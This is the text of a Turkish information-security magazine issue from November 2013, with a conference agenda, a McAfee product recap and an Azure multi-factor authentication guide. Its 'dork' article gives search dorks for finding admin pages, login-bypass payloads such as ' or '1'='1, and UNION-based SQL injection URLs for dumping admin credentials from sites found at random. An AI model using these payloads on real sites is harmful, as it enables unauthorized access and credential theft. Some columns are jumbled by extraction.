McAfee Advanced Threat Defense

Transkript

McAfee Advanced Threat Defense
2013
•
•
•
•
•
•
•
•
McAFEE FOCUS 13 GÜVENLİK KONFERANSININ ARDINDAN
WINDOWS AZURE MULTI-FACTOR AUTHENTICATION
“DORK” LAR
McAFEE ADVANCED THREAT DEFENSE
TÜRKİYE GÜVENLİK SEKTÖRÜNE GLOBAL BİR BAKIŞ
DİSK VERİ DEPOLAMA SİSTEMLERİ (DEVAM): DİSK PERFORMANS HESAPLAMALARI:
SOSYAL MEDYA PAYLAŞIMLARI SEBEBİYLE HUKUKİ SORUMLULUK
OBSERVE IT /SİSTEMİNİZDEKİ GÜVENLİK KAMERA SİSTEMİ
26 Kasım 2013 Salı
Point Hotel Barbaros
Web: http://www.nebulabilisim.com.tr/BS13
Kayıt: http://beyazsapka13.eventbrite.com
SAAT KONU
KONUŞMACI
UNVAN
ŞİRKET
Açılış Konuşması
Serkan Akcan
Bilgi Güvenliği Danışmanı/Yönetici Ortak
Nebula Bilişim
9:15
Bulut Bilişim ve Yasal Düzenlemeler
Leyla Keser Berber
Bilgi Üniversitesi Enstitü Direktörü
İstanbul Bilgi Üniversitesi
9:40
Microsoft ve Bulut Bilişim Güvenliği
Mehmet Üner
Sunucu ve Yazılım Araçları İş Grubu Yöneticisi
Microsoft
10:00
ISO 27001 Bilgi Güvenliği ve 22301 İş Sürekliliği Yönetimi Sistemi
Ali Dinçkan
Kıdemli Danışman/Yönetici Ortak
BTYÖN
10:25
Veeam ile Sanal Ortamda İş Sürekliliği
Murat Açıncı
Kıdemli Sistem Mühendisi
Veeam
10:45
Kahve Molası
11:10
McAfee Security Connected
İlkem Özar
Ülke Müdürü
McAfee
11:35
Avecto Yetki Yönetimi
Richard Midgley
Kanal Müdürü
Avecto
Caner Dağlı
Bilgi Güvenliği Uzmanı
Nebula Bilişim
8:00
Kayıt&Kahvaltı
9:00
11:55
Titus Veri Sınıflandırma ve Bilgi Güvenliği
Cem Uçtum
Direktör
Detech
12:15
ObserveIT, Sunucunuzdaki Güvenlik Kamerası
Arik Kasha
EMEA Satış Direktörü
ObserveIT
Ozan Özkara
Teknoloji Direktörü
Komtera
12:35
Öğle Yemeği
14:00
E-Fatura, E-Defter ve Elektronik Ödeme Sistemleri ile İlgili Yasal Gelişmeler Elif Kavuşturan
Bilgi Üniversitesi Enstitü Uzmanı/Avukat - BTS&Partners
İstanbul Bilgi Üniversitesi
14:25
Hardware Security Module (HSM) Uygulamaları
Okan Erözden
Bölge Satış Müdürü
SafeNet
14:45
Yeni Yatırımlar, Yeni Nesil McAfee Çözümleri
Serkan Kırmızıgül
Satış Mühendisi
McAfee
15:10
Skybox Network Security
Ozan Özkara
Teknoloji Direktörü
Komtera
15:30
Kahve Molası
16:00
Nebula Bilgi Güvenliği Yönetim Hizmeti
Erkan Şen
Teknik Müdür/Yönetici Ortak
Nebula Bilişim
16:25
Kale Holding Başarı Hikayesi
Yusuf Aydın
Ağ ve Güvenliği Yöneticisi
Kale Holding
16:45
BT Güvenliğinin Dönüşümü
Ramazan Yavuz
Kıdemli Araştırma Analisti
IDC
17:05
Hediye Çekilişi ve Kapanış
SPONSORLAR
Konferans hakkında güncel bilgileri öğrenmek, konferans sunumlarında soru-cevap sistemine dahil olmak ve hediye çekilişlerinden yararlanmak için
lütfen Nebula Bilişim'in Facebook ve Twitter hesaplarını takip edin.
Twitter: @nebulabilisim
Twitter Hashtag: #BeyazSapka13
Facebook: http://www.facebook.com/nebulabilisim
Değerli abonemiz,
Beyaz Şapka için yeni bir dönem başlıyor!
İçindekiler
04>> McAfee Focus 13 Güvenlik
Konferansının Ardından
Serkan Akcan
06>> Windows Azure Multi-Factor
Authentication
Önder Değer
10>> “dork” lar
İrfan Kotman
12>> McAfee Advanced Threat Defense
Serkan Kırmızıgül
16>> Türkiye Güvenlik Sektörüne
Global Bir Bakış
Ramazan Yavuz, Yeşim Araç
18>> Disk Veri Depolama Sistemleri
(devam): Disk Performans Hesaplamaları:
Tarkan Çiçek
B
eyaz Şapka projesi üç ayda bir olmak üzere yılda toplam dört sayı dergi
çıkartıyor ve ücretsiz olarak yaklaşık 1500 kişiye dağıtılıyor. Önceki sayılarımızda
Beyaz Şapka dergisinin artık tek başına yeterli olmadığını söyleyerek ipucu
vermiştik ve son sayımızda güzel bir sürprize hazırlandığımızdan söz etmiştik. Çalışmalarımız ilk meyvesini verdi. Artık Beyaz Şapka markasının dergiden sonra ikinci
bir ürünü var: Beyaz Şapka Bilgi Güvenliği Konferansı.
Beyaz Şapka markası altında bir bilgi güvenliği konferansı üretmek çok uzun
zamandır aklımızda vardı. Konferansın hayal ettiğimiz bir felsefesi, amacı ve içeriği
de vardı. Ancak 2013 yılı başına kadar istediğimiz içerikte bir konferans üretmek için
şartlar olgunlaşmamıştı. Beyaz Şapka dergisinin Şubat ayı sayısı itibarı ile şartların
olgunlaştığını görüp konferansa aktif katılım gösterecek kurumları belirleyerek
temasa geçtik ve tamamından olumlu yanıt aldık. Desteklerinden dolayı Avecto,
Btyön, Komtera, Microsoft, McAfee, ObserveIT, SafeNet, Skybox, Titus, Veeam
şirketlerine ve İstanbul Bilgi Üniversitesi Bilişim ve Teknoloji Hukuku Enstitüsüne
teşekkür ederiz.
Beyaz Şapka Bilgi Güvenliği Konferansı 26 Kasım 2013 Salı günü Point Hotel
Barbaros’da yapılacak ve düzenli olarak tekrar edilecek. Beyaz Şapka’daki değişim
konferanstan ibaret de değil ancak konferansı ve arkasındaki detayları öğrenmek
için açılış konuşmamızı izlemeniz gerekecek. Konferansa katılamayanlar Beyaz
Şapka konferansının ve arkasındaki işbirliğinin detaylarını Şubat ayı sayımızda
okuyabilecekler.
Konferansa katılım son kullanıcı kurumlara ücretsiz olacak. Katılımcı kalitesini belirli
bir seviyenin üzerinde tutmak ve kapasiteyi optimum kullanmak için katılım
başvuruları detaylıca incelenecek ve öncelik hedeflenen profile sahip kurumların
çalışanlarına öncelik verilecek.
20>> Sosyal Medya Paylaşımları Sebebiyle Hukuki Sorumluluk
Av. Mehmet Bedii Kaya
22>> Observe IT /Sisteminizdeki
Güvenlik Kamera Sistemi
İrfan Kotman
Nebula Bilişim’in bakım ve destek sözleşmeli müşterileri için özel bir notumuz var.
Siz her zaman çok özelsiniz! Eylül ayında sizin için bir pozitif ayrımcılık programı
başlattık. Sizlere özel promosyonlar, özel konferanslara katılım davetiyeleri, sektörel
özel toplantılar ve ücretsiz ek hizmetler gibi birçok avantaja sahip olacaksınız. Beyaz
Şapka Bilgi Güvenliği Konferansına da sizlerin öncelikli kayıt hakkınız bulunuyor.
Detaylı bilgi tüm bakım ve destek sözleşmeli müşterilerimize iletildi. Konu ile ilgili
mesajlarımızı almadığınızı düşünüyorsanız lütfen bizimle temasa geçin.
Eğer Beyaz Şapka Bilgi Güvenliği Konferansını ilk defa duyuyorsanız Nebula Bilişim’i
sosyal medya kanallarından takip etmiyorsunuz demektir. Konferans çalışmalarımız
Ekim ayı ortası itibarı ile Facebook ve Twitter hesaplarımızdan duyuruldu. Konferans
süresince Facebook ve Twitter hesaplarımız yoğun olarak kullanılacak ve çeşitli
sürprizlerimiz için altyapı oluşturacak. Lütfen bizi sosyal medya araçlarımızdan takip
edin.
www.nebulabilisim.com.tr
www.facebook.com/nebulabilisim
www.twitter.com/nebulabilisim
Güvenli Günler!
Beyaz Şapka Ekibi
Kasım 2013 beyaz şapka 3
Serkan AKCAN
[email protected]
McAfee Focus 13 Güvenlik
Konferansının Ardından
McAfee Focus konferans serisinin altıncısı yine ABD’nin Las Vegas şehrinde
gerçekleştirildi ve biz yine oradaydık. İşte size kısa bir özet!
M
cAfee Focus konferans serisinin altıncısı Focus 13 her yıl
olduğu gibi yine Las Vegas’ta The Venetian Hotel’de gerçekleştirildi. Her fırsatta Focus konferansından bahsetmeye
çalışıyoruz ama hiç bilmeyenler için kısaca özetleyeyim.
McAfee Focus bilgi güvenliği dünyası için tasarlanmış bir konferans.
Konferansın iş ortakları ve son kullanıcılar için iki farklı bölümü
bulunuyor. Her yıl ortalama dört bin kişinin katılımı ile gerçekleştiriliyor. Konferansta onlarca paralel oturum bulunuyor. Bu oturumlar
ürün ve teknolojilerin derinlemesine teknik detayları, sektörlere
özel sunumlar, ürünlerin yol haritaları, teknoloji ortaklarının entegre
çözümleri, yeni yapılan yatırımların tanıtımı gibi geniş bir alanı
kapsıyor. Konferans süresince McAfee yetkilileri ile bire bir toplantılar
düzenlenebiliyor.
Bu yıl da konferansa Nebula ve müşterileri olarak çıkarma yaptık.
Focus konferansı Partner Summit adında iki günlük iş ortakları
konferansı ile birleştirildi. İlk iki gün iş ortakları toplantısı yapıldı.
Partner Summit bölümünün ilk günü eğitim ikinci günü ise
sunumlar ile geçti. Sunumların bitmesi ile birlikte McAfee Focus
13 konferansı açılış resepsiyonu ile resmi olarak başladı ve iki gün
sürdü. Konferans süresince 70’ten fazla sunum yapıldı. İlk gün
onlarca paralel oturumun yanı sıra genel oturumlarda üst düzey
McAfee yöneticileri sahne aldı. İlk günün akşamında konferans katılımcıları Hard Rock Hotel’de Kid Rock konseri ile eğlendi.
Konferansın ikinci gününde teknik sunumların yanı sıra konferansın
onur konuğu olarak Amerika Birleşik Devletlerinin eski savunma
bakanı Leon Panetta genel oturumda sahneye çıktı.
Focus 13 konferansında verilmeye çalışılan mesajları 5 adımda anlatmaya çalışacağım.
1. Intel&McAfee işbirliği
Bildiğiniz üzere Şubat 2011’de Intel McAfee’yi satın aldı. Intel şirketi
önümüzdeki on yıla güvenlik konusunun damga vuracağını öngördüğü için bu satın almayı yaptığını duyurdu. Çok hızlı biçimde
McAfee yazılımları ile entegre çalışan silikon seviyesinde çözümler
geliştirdi. Bu süreçte McAfee logosunun altına “An Intel Company”
yazısı eklendi ancak bunun haricinde
McAfee’nin organizasyonuna hiçbir müdahalede bulunulmadı. Bugüne kadar
4 beyaz şapka Kasım 2013
McAfee tarafını da açık bir şekilde sahiplenmedikleri söylenebilir.
Ancak Focus 13’de yaşanan değişimi tüm katılımcılar fark etti.
Teknik sunumların içerisinde Intel’in yeri önemli derecede arttı ve
Intel’in tüm üst düzey yöneticileri konferansta hazır bulundu. Önümüzdeki dönem Intel ve McAfee isimlerini çok daha sık yan yana
göreceksiniz.
2. Yeni ürün: McAfee Advanced Threat Defense
McAfee geçen Şubat ayında ValidEdge şirketini satın aldı ve merakla
beklememize neden oldu. Satın alınan ürünün Ekim ayına kadar
geliştirme çalışmaları devam etti ve Focus 13 konferansında
lansmanı yapıldı.
McAfee Advanced Threat Defense (ATD) sandbox tekniği ile gelişmiş
tehdit analizi yaparak bilinmeyen ve APT niteliğinde olan atakları
tespit etmeye çalışıyor. McAfee tarafından satın alınmasının ardından
yapılan geliştirme çalışmaları ile ürün fark yaratmayı başarmış.
Ürünü kısaca 3 adımda anlatabiliriz.
rulabiliyor, registry kayıtları normale çevrilebiliyor, dosya ve
dizinlerde düzenlemeler yapılabiliyor.
3. Yeni ürün: StoneSoft
McAfee Mayıs ayında StoneSoft şirketini satın aldığını duyurdu.
Ürünün yeni adı McAfee Next Generation Firewall Powered by
StoneSoft. Ürün gelişmiş bir Next Generation Firewall olduğu için
uzun uzadıya teknik özelliklerinden bahsetmeyeceğim. Ancak özellikle üzerinde durdukları konunun “evasion” dediğimiz Firewall
ürünlerini atlama teknikleri olduğunu söyleyebilirim. Detayları öğrenmek ve test etmek için aşağıdaki web
sayfasına göz atmanızı öneriyorum.
http://evader.stonesoft.com/
4. McAfee Security Connected
McAfee ATD klasik olarak kodun veya uygulamanın çalıştırılması
yöntemini kullanıyor. Üstelik bunu yaparken McAfee yazılımlarının
yönetim konsolu olan McAfee ePolicy Orchestrator yazılımı ile
entegre olarak potansiyel tehdidin hedefindeki bilgisayarın işletim
sistemini ve uygulama listesini öğrenebiliyor ve ilgili testleri birebir
aynı sistemlerde yapabiliyor. Klasik test yönetiminin haricinde
statik ve dinamik analizler de yaparak tespit başarısını yükseltiyor.
McAfee uzun zaman önce entegre güvenlik felsefesini benimsedi
ve bütün ürünlerini çeşitli seviyelerde birbiriyle konuşur hale
getirdi. Bu entegrasyonlar logların korelasyona tabi tutulup basitleştirilmiş ve anlamlandırılmış çıktılara dönüşmesini sağladığı gibi
operasyonel olarak işleri kolaylaştıran hızlı bilgiye ulaşma, önleme
emri gönderme, detaylı analize gönderme ve riskli sistemlerin
otomatik güvenlik denetimine tabi tutulması gibi saymakla bitmeyecek kadar çok amaçlı kullanılabiliyor. Bu esneklik son kullanıcıların işini son derece kolaylaştırıyor ve güvenlik başarımını yükseltiyor. Konferansın programına baktığımızda hemen hemen her
sunumda bir entegrasyondan bahsedildiğini görebiliyoruz. Entegrasyon konusu McAfee’de güçlenerek devam edecek.
B. Durdurma (freeze)
5. McAfee Security Innovation Alliance
A. Tespit (find)
Atağı tespit etmek kadar önlemeyi de önemseyen McAfee ATD,
McAfee Network IPS ve McAfee Web Gateway ürünleri ile tam
entegre çalışıyor. Tespit edilen atağı anında engelleyebilen sistem,
atağın kopyalarını da otomatik engellemeye tabi tutabiliyor. Diğer
ürünlerle entegrasyon sayesinde atağa maruz kalan veya atağı
gerçekleştiren sistemlerin karantinaya alınması da mümkün.
C. Onarma (fix)
Ürünün en çarpıcı özelliklerinden biri onarma özelliği. Atağın
tespitiyle birlikte sisteme verilen zarar da net olarak tespit ediliyor.
Atak nedeniyle hafızada çalıştırılan uygulamalar, registry kayıtlarındaki
değişiklikler ve DLL gibi kritik dosyalardaki değişiklikler tespit
ediliyor. Merkezi yönetim konsolundan tek bir tıklama ile tüm bilgisayarlarda atak nedeniyle hafızada çalışan uygulamalar durdu-
McAfee bütün ürünlerini entegre hale getirmekle yetinmedi ve
entegrasyonun teknik altyapısını diğer üreticilere açtı. Bir anlamda
McAfee temel yönetim ürünlerini güvenlik pazarının middleware’i
gibi konumladı. Diğer güvenlik ürünü geliştiricileri McAfee Security
Innovation Alliance (SIA) programına başvurarak gerekli anlaşmaları
yapıyor ve teknik altyapıya erişim sağlıyor. SIA iş ortaklarının
bazıları McAfee ile ortak satış süreci de yürütüyorlar. Focus konferansında SIA sisteminin ne kadar hızlı büyüdüğünü gördük ve ne
kadar büyük ilgi gördüğüne şahit olduk. İş ortağı listesine baktığınızda
konunun ne kadar ciddi bir boyuta ulaştığını görebilirsiniz:
http://mcaf.ee/cowm0
Kısaca bahsetmek gerekirse SIA iş ortaklarının ürünleri ile antivirüs
yönetim konsolunu yetki yönetim yazılımına, yama yönetim sistemine, lisans takip yazılımına veya güç yönetimi sistemine çevirmek
mümkün. Tüm bunlar yönetim konsolu ePolicy Orchestrator yazılımına basit bir paket yükleyerek kolayca yapılabiliyor. Focus konferansına SIA iş ortakları çeşitli seviyelerde sponsor olarak destek
verdiler. Nebula olarak ilgimizi çeken birkaç üretici ile görüştük ve
çözümlerini test etmeye başladık. Testlerimizin tamamlanmasının
ardından bu çözümleri pazara sunacağız.
McAfee Focus 14
Önümüzdeki yıl McAfee Focus 14 konferansı 27-29 Ekim tarihlerinde
yine Las Vegas’ta The Venetian Hotel’de yapılacak. Konferans
hakkında bilgi almak için web sitesini ziyaret edebilir veya bizimle
temasa geçebilirsiniz.
http://www.mcafeefocus.com
Kasım 2013 beyaz şapka 5
Önder Değer
[email protected]
Windows Azure Multi-Factor
Authentication
BT dünyasının en hızlı büyüyen “Bulut Bilişim” platformu olan Windows Azure,
Windows Azure Multi-Factor Authentication (Çok Faktörlü Kimlik Doğrulama)
ile kimlik doğrulama ve güvenlik işlemlerini bir üst seviyeye taşıyor.
kullanarak kendi geliştirdikleri uygulamalar içerisinde kullanabilecekler.
Multi-Factor Authentication güvenlik teknolojisi;
katmanlı bir yapıdan oluşmaktadır. Birden fazla
kimlik doğrulama metoduyla saldırganlar için
önemli bir meydan okuma sunmaktadır. Bu metotlar aşağıdaki gibidir:
• Tipik parola
• Akıllı telefon gibi kolayca taklit edilemeyecek
bir aygıt
• Biometric
Bir saldırgan yukarıda saydığımız kimlik doğrulama
metotlarından kullanıcı parolasına sahip olsa bile
Son kullanıcılar ve kurumsal firmaların “Bulut Bilişim” platformlarında
MFA için yetkilendirilmiş güvenilir bir cihaza sahip olmadığından
en çok merak ettiği konulardan biridir güvenlik. Windows Azure’un
kimlik doğrulamayı geçemeyecektir. Windows Azure Multi-Factor
güvenliği konusunda önemli bir katkı sağlayan Multi-factor (MFA)
Authentication kullanıcıları aynı zamanda mobil uygulama, telefon
ya da two-factor (2FA) teknolojisi; birden fazla kimlik doğrulama
veya kısa mesaj kullanarak kimliklerini doğrulayabilirler.
yönetiminin birlikte kullanıldığı ve kullanıcı oturum açma işlemlerine
Kimlik Doğrulama Seçenekleri
ikinci bir katman daha ekleyerek güvenliği önemli derecede arttıran
bir kimlik doğrulama yöntemidir.
Çoklu out-of-band yöntemleri ve tek kullanımlık parola seçeneği
ile Windows Azure Multi-Factor Authentication kullanıcıların tercih
Windows Azure’un coğrafi olarak dağıtılmış veri merkezleri, güvenlik
ettikleri yöntem ile kimlik doğrulama işleminin başarısız olması
ve güvenirlilik için ISO/IEC 27001:2001 gibi temel endüstri standartları
durumunda yedekleme seçenekleri için esneklik sağlamaktadır.
ile uyumludur. Şimdi de kullanıcılar Multi-Factor Authentication
1)
teknolojisini ister Windows Azure Active Directory ile birlikte
Android ve IOS kullanıcılarının ücretsiz indirebilmeleri için Store’lar
isterlerse şirket içi kaynaklarını güvenlik altına almak için Windows
da bulunmaktadır. Uygulama yüklendikten sonra ek güvenlik sağ-
Azure Multi-Factor Authentication Server ile birlikte isterlerse SDK
lamak için 2 farklı modda çalışabilir.
6 beyaz şapka Kasım 2013
Multi-Factor Authentication Uygulamaları, Windows Phone,
esnasında ek doğrulama metodunu kurmaları istenmektedir. Multi-Factor Authentication’ı Windows Azure, Office 365
ve Dynamics CRM Online gibi bulut ortamlarınızın güvenliğini artırmak için kullanabilirsiniz. Bununla birlikte Microsoft
bulut platformu dışında kullandığınız diğer
bulut bilişim platformlarını Windows Azure
Active Directory ile entegre ettiyseniz,
MFA için ek ayarlar yapmanıza gerek
yoktur. Çok sayıda kullanıcı ve küresel ölçekte uygulamalar için kolayca etkinleştirilebilmektedir.
a)
Bildiri: Bu modda Windows Azure MFA, hesapları yetkisiz
erişimlere karşı engeller ve hileli yapılan işlemleri durdurur. Bunu
Şirket içi kaynakların ve Active Directory
güvenliği
kullanıcının telefonuna bir bildirim mesajı göndererek yapmaktadır.
Kullanıcı basitçe bildirimi görür ve bildiği bir erişim ise kimlik doğrulamayı onaylar.
Windows Azure Multi-Factor Authentication Server kullanarak
şirket içi kaynaklarınızı da Active Directory ortamınızı da MFA ile
daha güvenli hale getirebilirsiniz. Windows Azure Multi-Factor
b) Tek kullanımlık parola: Bu modda, Windows Azure MFA uygulaması
Authentication yöneticilere Microsoft IIS web uygulamalarını IIS,
bir OATH parolası oluşturmak için kullanılabilir. Daha sonra
RADIUS, LDAP ve Windows kimlik doğrulama metotlarını entegre
oluşturulan bu parola, kimlik doğrulama esnasında kullanıcı adı
ederek sunmaktadır.
ve parolası ile birlikte kullanılacaktır.
Windows Azure Multi-Factor Authentication Server’ı indirmek için
2) Otomatik Telefon Araması metodu ile sabit veya cep telefonu
iki farklı yöntem bulunmaktadır. Bunlardan ilki Windows Azure
hattınıza otomatik bir arama gelmektedir. Kullanıcı sadece # tuşunu
portal alanında Multi-Factor Authenticaton alanına gelerek bir
tuşlayarak kimlik doğrulama işlemini onaylamış olmaktadır.
MFA oluşturmanız ve Manage butonuna tıklamanız. Açılan Mana-
3) Kısa Mesaj, Windows Azure MFA tarafından belirlenen cep tele-
gement Portal ekranında Download bölümüne gelerek
fonuna gönderilir. Metin mesajı tek kullanımlık şifre içermektedir.
Kullanıcı bu tek kullanımlık parolayı kullanarak kimlik doğrulama
işlemini tamamlar. SDK için şu anda sadece telefon araması ve kısa
mesaj metotları kullanılabilmektedir.
Dilerseniz Windows Azure Multi-Factor Authentication’ın kullanımların
alanlarını birlikte inceleyelim.
Bulut ortamının güvenliği
indirme işlemine başlayabilirsiniz. Bir diğer yöntem ise
https://pfweb.phonefactor.net adresine bağlanmanız ve daha önceden PhoneFactor adresine kayıt ettirdiğiniz kullanıcı adınız ile
oturum açmanız. Yine açılacak ekranda download bölümünden
serverı indirebilirsiniz.
Özel uygulamaların güvenliği
Yazılım Geliştirme Seti (SDK), bulut hizmetlerinizle doğrudan tümleşiktir. Multi-Factor Authentication telefon çağrısı ve SMS ile doğ-
Windows Azure Active Directory kullanıcıları için Multi-Factor Aut-
rulama yöntemlerini uygulamanızın oturum açma veya işlem sü-
hentication etkinleştirilerek kullanıcıların sonraki oturum açmaları
reçlerine ekleyebilir ve uygulamanızın var olan kullanıcı veri taba-
Kasım 2013 beyaz şapka 7
Önder Değer
[email protected]
nından yararlanabilirsiniz.
Şimdi de birlikte Windows Azure Multi-Factor Authentication’ın
New butonuna bastığınızda karşınıza gelen ekranı aşağıdaki bilgiler
doğrultusunda doldurabilirsiniz.
yapılandırma işlemlerine birlikte bakalım.
a. Name – Active Authentication sağlayıcınız için belirlemeniz ge-
Active Authentication Sağlayıcısının Oluşturulması
reken isim bölümü
Windows Azure ortamınızda active authentication sağlayıcıyı oluşturabilmeniz için Windows Azure Portal bölümüne yetkili bir
kullanıcı ile giriş yapmanız gerekmektedir. Giriş işlemini başarılı
b. Usage Model – Active Authentication sağlayıcınız için kullanım
modeli
a. Per Authentication – Bu model satın alınan kimlik doğrulama
başına ücretlendirmektedir. Bir uygulama içerisinde Windows
Azure Active Authentication kullanımı gerektiren senaryolar için
uygundur.
b. Per Enabled User – Bu model satın alınan her etkin kullanıcı
başına ücretlendirilmektedir. Office 365 gibi senaryolar için uygundur.
c. Directory – Windows Azure sağlayıcınızı Windows Azure Active
Directory servisiniz ile ilişkilendirmek istediğinizde belirlemeniz
gereken bölümdür.
Create butonuna bir kez bastığınızda Active Authentication Provider
oluşturulmaya başlanacak Successfully mesajı ile başarılı bir şekilde
oluşturduğunuzu göreceksiniz.
bir şekilde geçtikten sonra ekranın sol bölümünde bulunan Active
Directory bölümüne gelin ve burayı tıklayın.
Windows Azure Multi-Factor Authentication için
hilecilik ayalarının yapılması
Açılan Active Directory penceresinde ekranın üst bölümünde bulunan Active Authentication Providers bölümünü seçin New butonuna tıklayın.
8 beyaz şapka Kasım 2013
Windows Azure Multi-Factor Authentication sağlayıcınızı oluşturduktan sonra Manage butonuna basarak Windows Azure MultiFactor Authentication Management Portal sayfasını açın.
Açılan sayfanın sol bölümünden Settings alanına tıklayın. Açılan
çalışanının sahte girişim için
Settings sayfasında da Fraud Alert bölümünden Allow users to
bilgilendirileceği mesajı ile
submit Fraud Alerts bölümünü seçerek sahte girişler için alarm
karşılaşacaksınız. Report Fra-
verilmesini sağlayabilirsiniz. Yine aynı pencerede sahte giriş yaptığını
ud butonu ile işlemi tamam-
bildirdiğiniz kullanıcıları Block user when fraud is reported seçeneği
layabilirsiniz.
Bloklanan tüm sahte girişimleride Windows Azure Multi-Factor Authentication Management Portal ekranından
raporlayabilirsiniz. View a Report bölümünün altında Fraud Alert bölümüne tıklayın
ve açılan pencerede raporlamak istediğiniz tarih aralığını belirtin. Dilerseniz özel
ile bloklayabilirisiniz. Telefon
ile gelen doğrulama metodunda ise güvenilmeyen kullanıcı girişlerini Create to report fraud during initial greeting kutucuğuna girdiğiniz
numara ve # işaretini kullanarak raporlayabilirsiniz.
Bu işlemleri gerçekleştirip
Save butonuna bastıktan
sonra raporlama ve bloklama
işlemlerini kontrolünü yapabilirsiniz. Telefonunuzda bulunan Multi-Factor Authentication uygulamasına doğrulama bildirimi geldiğinde
aşağıdaki gibi bir görünüm
olacaktır.
Cancel and Report Fraud butonuna basarsanız, kuruluşunuzun IT
bir kullanıcı adı ya da telefon numarası belirtebilirsiniz. Run
butonuna bastığınızda raporunuz hazırlanacaktır ve Export to CSV
komutuyla da raporunuzu dışarıya çıkartabilirsiniz.
Windows Azure Multi-Factor Authentication Management Portal
sayfasından sadece hilecilik ayarlarını değil birçok farklı bölümün
ayarlarına dokunabiliyorsunuz. İsterseniz kendiniz dilediğiniz kullanıcıları ya da telefon numaralarını bloklayabileceğiniz gibi
dilediğiniz kullanıcılardan da bloku kaldırabilirsiniz. Telefon aramaları
için dilediğiniz sesli mesajları ekleyebilir, bildirimler için e-mail adresleri tanımlayabilirsiniz.
Makalemizin sonuna geldiğimiz bu bölümde Windows Azure Multi-Factor Authentication ile ilgili detaylı bilgilere http://www.windowsazure.com , http://msdn.microsoft.com , http://technet.microsoft.com adreslerinden de ulaşabilirsiniz.
Kasım 2013 beyaz şapka 9
İrfan Kotman
[email protected]
“dork” lar
Bu sayımızda, geçen sayımızdaki Underground yazısı sırasında değindiğimiz
“dork” ları detaylandıracağız ve dorklar kullanılarak tespit edilen sitelere elle
yapılabilen birkaç birkaç basit SQL Injection atağı örneğinden bahsedeceğiz.
SQL Injection Nedir ?
Kullanıcılar ya da uygulamalar tarafından Web sayfalarına yollanan
isteklere SQL sorgu parçacıkları eklemek olarak tanımlanabilir.
Birçok Web sayfası kullanıcılardan gelen istekleri alır ve veri tabanı
üzerinde sorgular çalıştırır. SQL Injection sırasındaki girdiler ile
SQL sorgularında hakkımız olmadığı halde belirli sonuçlara erişebilme
şansını elde edebiliriz.
Günümüzde Web sayfalarının yapılarının tasarımı sırasında güvenliğin
ön plana tutulması ve Web tasarımı sırasında kullanılan yapıların
değişmesi sebebi ile SQL açığına sahip site sayısı azalmıştır. Buna
rağmen günümüzde de internet siteleri ya da forumlarda SQL Injection atağına maruz kalmış yada maruz kalması olası site örneklerini
görebilmekteyiz.
Arama Motoru Dorkları
Bu sayımızdaki ilk SQL Injection atağı yapılacak site örneğimizi belirlemek için "inurl:login/admin.asp" dorkunu kullanıyoruz ve uyan
siteleri belirliyoruz.
Web sitelerine ait yönetici sayfalarını belirlenirken denediğimiz
"inurl:login/admin.asp" dışında,
" i n u r l : a d m i n . a s p ",
"inurl:administratorlogin.asp" , "inurl:adminlogin.asp", "inurl:adminh o m e . a s p "
"inurl:admin_login.asp"
gibi bir çok kriter kullanma şansına sahibiz.
"inurl:login/admin.asp"
kullanarak belirlediğimiz
Web sitesine yapılabilecek en temel SQL Injection atağı “admin”
hesabı ile siteye erişilmeye çalışılmasıdır. Hala birçok sitenin yönetici
hesabı girişlerinde olağan isim olarak kullanılan “admin” hesabı
kullanılmaktadır.
http://siteismi/login/admin.asp?id=admin 'or'1'='1
10 beyaz şapka Kasım 2013
sorgusu ile yönetici olarak siteye bağlanılmasının denenmesi en
kolay SQL Injection atağı olarak tanımlanabilir. Aynı sorgu kullanıcı
adı ve şifre ekranı kullanılarak aşağıdaki gibi denenebilir.
Kullanıcı Adı: Admin
Şifre : 'or'1'='1
SQL girdisi olarak 'or'1'='1 dışında birçok sorgu örneği site üzerindeki
yönetici hesabına erişim için kullanabilir. Aşağıda kullanabilecek
girdi örneğini görebilirsiniz.
' or '1'='1, ' or 'x'='x, ' or 0=0 --, " or 0=0 --,
or 0=0 --, or 0=0 #, " or 0=0 #, or 0=0 #,
' or 'x'='x, " or "x"="x, ' or 1=1--, " or 1=1--, or 1=1",
or "a"="a, ') or ('a'='a, ") or ("a"="a) v.b.
Peki bu girdiler ne anlama gelir ?
Klasik Web sayfalarındaki giriş yapılarını oluşturan kodları kandırmak
için yukarıdaki girdiler kullanılabilir. Bu girdiler ile çalıştırılan
sorgular sayesinde kullanıcı adı ve şifre girmeden siteye giriş sağlanabilir.
Bir sitenin SELECT * FROM Members WHERE username =
'" &
Username & "' AND Password = '" & Password & "'")
gibi bir koda sahip olduğunu düşünelim. Web sayfasına 'OR 1=1
(True) girdisi yollayarak şifrenin doğru olduğuna yada tam tersi bir
istekle boş olduğuna inandırılarak giriş yapılabilir.
Basit bir SQL Injection Atağı
Bu sefer "inurl:newsdetail.php?id” kullanılarak bir site belirliyoruz.
Belirlediğimiz sitenin SQL ataklarında uygun olup olmadığı basit
yöntemler ile tespit edilebilir. Bunun için tarayıcı üzerinden sitedeki
bir id ye (’) girdisi yolluyoruz.
http://SiteAdı/newsdetail.php?id=X’
“your MySQL server version for the right syntax to use near '\'' at
line 1” şeklinde bir hata mesajının veri tabanından geri döndüğü
görüyoruz.
Bu hata mesajı veri tabanına erişimin şansımız olduğunu anlamı
taşımaktadır.
Bu sefer sitedeki açık olabilecek kolonları belirlemek için tarayıcımıza
aşağıdaki girdiyi yazıyoruz.
http://SiteAdı/newsdetail.php?id=X union+all+select+1,2,3,4,5,6,7,8,9
--
kullanılarak, bu denemeleri otomatik olarak gerçekleştirebilmekte
ve açıklar üzerinden bilgi elde edilebilmektedir. Örnek olarak Aşağıdaki araç yardımı ile girilen komut yardımı ile SQL üzerindeki
kullanıcı tablolarını listeleme şansınız olabilmektedir.
Yolladığımız girdi sayesinde açık olabilecek kolonları belirliyoruz.
Açık olabilecek kolonlar içinden 8 numaralı kolonu seçerek,
http://SiteAdı/newsdetail.php?id=X union all select 1,2,3,4,5,6,7,table_name,9 from information_schema.tables—
Değerini tarayıcımıza giriyoruz.
Bu girdi ile veri tabanının
sürümünü olan 5.0.77
erişebildiğimizi görebilmekteyiz.
Bu sefer işi bir adım öteye taşıyoruz.
http://SiteAdı/newsdetail.php?id=X
union+all+select+1,2,3,4,5,6,7, group_concat(table_name),9+from+information_schema.tables+where
+table_schema=database()—
Bu girdi sayesinde siteye ait yönetici hesaplarının bulunduğu
“tbladmin” isimli tablo olduğunu tespit ediyoruz.
Yönetici hesaplarının bulunduğu tablo belirlendikten sonra,
http://SiteAdı/newsdetail.php?id=X union all select 1,2,3,4,5,6,7,concat(username,0x3a,password),9 tbladmin
